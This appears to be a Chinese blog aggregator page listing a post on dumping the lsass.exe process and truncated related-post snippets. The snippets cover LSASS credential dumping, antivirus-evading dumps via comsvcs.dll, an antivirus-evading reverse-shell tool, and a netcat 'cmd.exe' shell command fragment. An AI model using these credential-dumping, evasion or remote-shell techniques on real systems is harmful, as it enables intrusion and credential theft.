记一次服务器病毒查杀过程:lsass.exe占用内存高
前几天,一大早上班就被用户单位在群里呼叫,说系统登不上去了。我自己试了一下,Web站点能够访问,想上服务器上看看日志上是不是有什么问题。谁知道服务器远程桌面一直无法连接。只能找基础设施同 ...
原文:分享一个转储lsass.exe进程的工具
dump lsass for Win x .c 和 dump lsass for Win x .c 是国外一位大佬写的专门转储lsass.exe进程的工具 参考链接:https: osandamalith.com shellcode to dump the lsass process procdump.exe 是微软官方的进程转储工具,设计初衷是抓取崩溃进程的内存数据 下载地址:https: do ...
2019-07-26 13:54 0 550 推荐指数:
相关推荐
Dump Lsass内存转储新旧方法
之前看到一篇关于Lsass内存dump的文章,学习记录一下。 lsass.exe(Local Security Authority Subsystem Service)进程空间中,存有着机器的域、本地用户名和密码等重要信息。如果获取本地高权限,用户便可以访问 LSASS 进程内存 ...
comsvcs.dll转储lsass(过360卫士&火绒)
简介 实际使用 用api调或者看进程都可以 ...
分享一个免杀的反弹shell工具(python脚本转换成exe)
有时候网站服务器上有杀毒软件,我们上传的nc.exe、lcx.exe等工具都被杀了,这时候就需要一款免杀的工具来反弹shell。 这篇博客主要是依据国外的一片文章翻译而来,根据国外大佬的教程将Python脚本转换成exe程序即可免杀。 参考链接:https://medium.com ...
分享一个免杀的netcat.exe
: netcat -l -p 443 第2步: 内网服务器执行: netcat.exe -t -e cmd.e ...
分享自己做的一个指定进程以及线程长时间cpu监控的工具
前言: 前面给大家分享过一个工作中用到的编译拷贝脚本,其实工作中还有一些其他工具的使用,今天再来分享一个自己纯手工的CPU监控的脚本。大家可以结合上篇文章与本篇文章一起学习shell。 主要实现功能: 1.监控指定进程是否运行 2.读取该进程所在当前CPU的占用率,5s一次 ...
分享一个批量ping工具
一款来自于NirSoft的批量ping软件,可以同时ping多个不同的ip地址。 单击"ping操作选项" "粘贴OR输入ip地址" 主界面就可以看到 ...
Visual Studio远程调试监视器(MSVSMON.EXE)的32位版本不能用于调试64位进程或64位转储
在VS2013中调试Silverlight项目时,提示:无法附加。Visual Studio远程调试监视器(MSVSMON.EXE)的32位版本不能用于调试64位进程或64位转储。请改用64位版本。 解决方法很简单: 把调试按钮的调试程序Internet Explorer改成Internet ...